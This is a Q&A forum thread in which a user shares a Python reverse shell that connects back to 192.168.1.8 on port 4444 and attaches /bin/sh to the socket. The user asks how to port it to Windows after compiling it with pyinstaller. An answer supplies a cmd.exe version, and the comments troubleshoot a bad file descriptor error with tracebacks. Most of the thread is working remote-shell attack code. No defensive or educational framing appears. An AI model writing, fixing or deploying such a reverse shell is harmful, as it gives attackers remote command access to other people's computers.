0

i have this piece of code

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.1.8",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

This works well on Linux but not on Windows. I compilie it using pyinstaller and when I run it on Windows i get a bad file descriptor on line 4. how do I make a reverse shell that works on Windows with this method?

DobbyTheElf
  • 604
  • 6
  • 21
amiroof
  • 31
  • 3

1 Answers1

2

Try changing the Linux shell call to a Windows one

import socket, os, subprocess

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.1.8",4444))

p = subprocess.Popen(['cmd.exe', '/c', 'ver'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

print("File descriptor is: ", s.fileno())  

print("About to redirect stdin")
os.dup2(s.fileno(), p.stdin.fileno())

print("About to redirect stdout")
os.dup2(s.fileno(), p.stdout.fileno())

print("About to redirect stderr")
os.dup2(s.fileno(), p.stderr.fileno())

p.wait()
ProfDFrancis
  • 8,816
  • 1
  • 17
  • 26
  • still getting a bad file descriptor error. on line 8. – amiroof Mar 11 '23 at 09:07
  • Remember that answerers are having to guess which line is line 8, and guess which file descriptor is causing the problem. Can you see if you can add some print statements that will give debugging information? – ProfDFrancis Mar 11 '23 at 13:18
  • i added a print before and after the os.dup2 line (which is the line 8) and this was the log: `this is before os.dup2` this was it. i used > to save the log. – amiroof Mar 11 '23 at 17:03
  • Um... so _which_ file descriptor was it? – ProfDFrancis Mar 11 '23 at 17:58
  • I'm also stuck at this same bad file descriptor error as well. Can anyone please help? – PandaSurge Jul 01 '23 at 06:43
  • What I meant was _which_ file descriptor was giving the error? p.stdin? p.stdout? p.stderror? – ProfDFrancis Jul 03 '23 at 10:39
  • File descriptor is: 372 About to redirect stdin Traceback (most recent call last): File "C:\Users\User\Desktop\reverse.py", line 11, in os.dup2(s.fileno(), p.stdin.fileno()) OSError: [Errno 9] Bad file descriptor – PandaSurge Jul 26 '23 at 04:29
  • and line 11 of my code is: os.dup2(s.fileno(), p.stdin.fileno()) – PandaSurge Jul 26 '23 at 04:33